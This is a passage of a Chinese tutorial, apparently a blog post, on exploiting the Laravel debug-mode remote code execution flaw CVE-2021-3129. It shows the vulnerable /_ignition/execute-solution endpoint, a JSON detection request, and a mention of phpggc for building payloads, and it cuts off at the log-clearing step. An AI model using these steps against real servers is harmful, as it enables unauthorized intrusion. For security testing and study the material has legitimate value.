Laravel Debug mode RCE(CVE-2021-3129)漏洞利用

本文详细介绍了如何利用Laravel的Debug模式远程代码执行漏洞(CVE-2021-3129)。首先,通过访问特定URL触发漏洞,接着利用POST请求和JSON内容类型进行进一步操作。包括清空日志、添加日志前缀、生成POC、处理日志文件干扰字符,以及通过phar://进行反序列化尝试执行代码。在复现过程中,发现数据包内容需要精简,仅保留host、Content-Length、Content-Type,其他字段可能导致利用失败。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. 访问Laravel
    在这里插入图片描述

访问/_ignition/execute-solution 抓包
会出现如下页面
在这里插入图片描述
2. 检测
修改为POST,添加内容
并且修改
Content-Type: application/json

{
   
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
   
    "variableName": "username",
    "viewFile": "xxxxxxx"
  }

在这里插入图片描述
3.利用
需要先安装phpgcc用于生成POC,下载地址: https://github.com/ambionics/phpggc

3.1 清空日志
发送如下数据包,将Laravel的原日志文件laravel.log清空

{
   
  "solution": 
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值